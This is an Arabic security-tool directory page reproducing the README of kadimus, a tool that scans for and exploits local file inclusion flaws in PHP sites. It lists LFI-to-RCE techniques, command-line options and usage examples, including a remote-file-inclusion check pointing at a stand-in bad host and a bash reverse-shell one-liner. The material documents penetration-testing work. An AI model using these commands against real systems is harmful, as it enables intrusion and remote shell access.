Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/p0cl4bs/kadimus
ماسحات الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus هو أداة لفحص واستغلال ثغرة lfi.

عرض المستودع
5751273منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

أداة فحص واستغلال ثغرات LFI

kadimus هي أداة للتحقق من ثغرات LFI واستغلالها، مع التركيز على أنظمة PHP.

الميزات:

  • فحص جميع معاملات URL
  • تنفيذ الأوامر عبر /var/log/auth.log RCE
  • تنفيذ الأوامر عبر /proc/self/environ RCE
  • تنفيذ الأوامر عبر php://input RCE
  • تنفيذ الأوامر عبر data://text RCE
  • تنفيذ الأوامر عبر expect://cmd RCE
  • كشف كود المصدر
  • واجهة شل أوامر عبر طلب HTTP
  • دعم الوكيل (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  • دعم وكيل socks5 للاتصالات عن بُعد
  • الترجمة:

    أولاً، تأكد من تثبيت جميع التبعيات في نظامك: libcurl, libopenssl, libpcre و libssh.

    ثم يمكنك استنساخ المستودع للحصول على الكود المصدري:

    root@kitploit:~
    $ git clone https://github.com/P0cL4bs/kadimus.git
    $ cd kadimus
    

    وأخيراً:

    root@kitploit:~
    $ make
    

    الخيارات:

    root@kitploit:~
    Options:
      -h, --help                    Display this help menu
    
      Request:
        -B, --cookie STRING         Set custom HTTP cookie header
        -A, --user-agent STRING     User-Agent to send to server
        --connect-timeout SECONDS   Maximum time allowed for connection
        --retry NUMBER              Number of times to retry if connection fails
        --proxy STRING              Proxy to connect (syntax: protocol://hostname:port)
    
      Scanner:
        -u, --url STRING            URL to scan/exploit
        -o, --output FILE           File to save output results
    
      Explotation:
        --parameter STRING          Parameter name to inject exploit
                                    (only needed by RCE data and source disclosure)
    
      RCE:
        -T, --technique=TECH        LFI to RCE technique to use
        -C, --code STRING           Custom PHP code to execute, with php brackets
        -c, --cmd STRING            Execute system command on vulnerable target system
        -s, --shell                 Simple command shell interface through HTTP request
    
        --connect STRING            IP/hostname to connect to
        -p, --port NUMBER           Port number to connect to or listen on
        -l, --listen                Bind and listen for incoming connections
    
        --ssh-port NUMBER           Set the SSH port to try command injection (default: 22)
        --ssh-target STRING         Set the SSH host
    
        RCE Available techniques
    
          environ                   Try to run PHP code using /proc/self/environ
          input                     Try to run PHP code using php://input
          auth                      Try to run PHP code using /var/log/auth.log
          data                      Try to run PHP code using data://text
          expect                    Try to run a command using expect://cmd
    
        Source Disclosure:
          -S, --source              Try to get the source file using filter://
          -f, --filename STRING     Set filename to grab source [REQUIRED]
          -O FILE                   Set output file (default: stdout)
    
    

    أمثلة:

    المسح:

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact -A my_user_agent
    

    الحصول على كود المصدر لملف:

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg
    

    تنفيذ كود PHP:

    root@kitploit:~
    ./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input
    

    تنفيذ أمر:

    root@kitploit:~
    ./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost
    

    التحقق من RFI:

    يمكنك أيضًا التحقق من أخطاء RFI — فقط ضع عنوان URL البعيد في ملف resource/common_files.txt والتعبير النمطي للتعرف عليها، مثال:

    root@kitploit:~
    /* http://bad-url.com/shell.txt */
    <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
    

    في الملف:

    root@kitploit:~
    http://bad-url.com/shell.txt?:scorpion say get over here
    

    شل عكسية:

    root@kitploit:~
    ./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0
    

    المساهمة

    يمكنك المساعدة بالكود، أو بالتبرع. إذا كنت ترغب في المساعدة بالكود، استخدم أسلوب تنسيق كود النواة كمرجع.

    باي بال:

    BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

    تنزيل الأداة